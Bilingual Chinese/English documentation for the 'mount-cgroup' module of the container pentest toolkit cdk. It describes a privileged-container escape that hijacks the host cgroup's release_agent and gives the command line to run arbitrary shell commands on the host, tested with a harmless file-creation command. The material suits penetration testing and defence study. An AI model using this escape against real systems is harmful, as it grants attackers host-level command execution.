自动化逃逸与宿主机共享cgroup的容器。常用于逃逸特权容器。

该脚本将宿主机cgroup目录挂载到容器内，随后劫持宿主机cgroup的release_agent文件，通过linux cgroup notify_on_release机制触发shellcode执行，完成逃逸。

Automated escape container which shares cgroup namespace with outside host, especially for escape privileged containers.

This exploit will first mount host cgroup dir into container, then overwrite host cgroup's release_agent file to inject shellcode, finally trigger shell code execution with linux cgroup notify_on_release feature.

See Also:

• https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
• https://twitter.com/_fel1x/status/1151487051986087936

./cdk run mount-cgroup "<shell-cmd>"
# after exploit, the target host will execute user-specified commands in <shell-cmd> arg.

测试案例

1. 宿主机以特权模式启动容器，尝试在该容器内部通过本脚本逃逸。docker run -v /root/cdk:/cdk --rm -it --privileged ubuntu bash
2. 容器内部执行 ./cdk run mount-cgroup "touch /tmp/exp-success"
3. 宿主机中出现/tmp/exp-success文件，说明exp已经成功执行，攻击者可以在宿主机执行任意命令。

Testing Case

1. run a privileged container in host docker run -v /root/cdk:/cdk --rm -it --privileged ubuntu bash, try to escape this container using CDK.
2. attach into the container and execute ./cdk run mount-cgroup "touch /tmp/exp-success"
3. back to the host, check /tmp/exp-success file exists, which means our shell cmd was executed successfully. by modifying <shell-cmd> arg you can exec any cmd you want in target host.